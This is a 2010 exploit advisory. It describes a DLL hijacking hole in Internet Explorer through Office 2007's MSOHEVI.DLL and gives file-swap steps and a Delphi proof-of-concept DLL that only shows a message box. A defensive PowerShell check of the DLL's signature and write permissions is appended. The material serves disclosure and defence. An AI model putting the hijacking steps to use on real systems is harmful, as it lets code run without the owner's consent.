
Internet Explorer Dll Hijacking Exploit

Posted on 08 September 2010

Exploit Title : [Internet Explorer Dll Hijacking Exploit]
Date          : [08 Sept 2010]
Author        : [STRELiTZIA]
Software      : [INTERNET EXPLORER]
Tested on     : [Windows Xp SP3 + Office 2007]

============================
=       Description        =
============================
Internet Explorer loads the %drive%:\%Program Files%\Microsoft Office\Office12\MSOHEVI.DLL library without checks or any visual warning messages related to library modifications.
This vulnerability can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application.

============================
=       Instructions       =
============================
1- Copy "Test.dll" into "%drive%:\%Program Files%\Microsoft Office\Office12"
2- Rename "MSOHEVI.DLL" to "MSOHEVI.DLL_Original".
3- Rename "Test.dll" to "MSOHEVI.DLL".

============================
=          Tests           =
============================
- Launch Internet Explorer.

============================
= Test Dll Source "Delphi" =
============================
library Test;

uses
  Windows;

begin
  // Library initialization code: runs when the host process loads the DLL.
  MessageBoxA
  (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
    PChar('Sample'),
    MB_ICONSTOP
  );
end.

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-09-08]
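A defender-side check for the condition described above, as an added example that is not part of the original advisory: it reports whether the DLL Internet Explorer loads is still validly signed and which identities other than Administrators and SYSTEM can write to the file or its folder, since the instructions depend on replacing the file there. The function name `Test-LoadedDllTrust`, the `-DllPath` parameter and the default path are assumptions, as is the expectation that the genuine DLL carries a Microsoft Authenticode signature; PowerShell 3.0 or later is assumed.

```powershell
# Added example, not part of the advisory. Assumes PowerShell 3.0+ and the
# default Office 2007 location; pass -DllPath for other layouts.
param(
    [string]$DllPath = (Join-Path $env:ProgramFiles 'Microsoft Office\Office12\MSOHEVI.DLL')
)

function Test-LoadedDllTrust {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) {
        return [pscustomobject]@{ Path = $Path; Present = $false }
    }

    # Signature: the assumption is that the genuine DLL is Authenticode-signed by
    # Microsoft, so a swapped file shows as NotSigned, HashMismatch or another signer.
    $sig    = Get-AuthenticodeSignature -FilePath $Path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }

    # Permissions: rights that allow creating, overwriting, renaming or deleting.
    $R    = [System.Security.AccessControl.FileSystemRights]
    $mask = [int]($R::WriteData -bor $R::AppendData -bor $R::Delete -bor
                  $R::DeleteSubdirectoriesAndFiles)
    $expected = 'S-1-5-32-544', 'S-1-5-18'   # BUILTIN\Administrators, SYSTEM

    # Check both the DLL itself and the folder it lives in.
    $writers = foreach ($target in $Path, (Split-Path -Parent $Path)) {
        $rules = (Get-Acl -LiteralPath $target).GetAccessRules(
            $true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            if ($rule.AccessControlType -eq 'Allow' -and
                (([int]$rule.FileSystemRights -band $mask) -ne 0) -and
                ($expected -notcontains $rule.IdentityReference.Value)) {
                '{0} on {1} ({2})' -f $rule.IdentityReference.Value, $target, $rule.FileSystemRights
            }
        }
    }

    [pscustomobject]@{
        Path             = $Path
        Present          = $true
        SignatureStatus  = $sig.Status
        Signer           = $signer
        SignedByMS       = ($sig.Status -eq 'Valid' -and $signer -match 'O=Microsoft Corporation')
        UnexpectedWriter = @($writers)   # empty when only Administrators/SYSTEM can write
    }
}

Test-LoadedDllTrust -Path $DllPath
```

Access rules that use generic rights (for example inherit-only entries for CREATOR OWNER) are not matched by the mask, and service identities that legitimately own the folder will appear in `UnexpectedWriter` and need to be judged by the reader.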

 
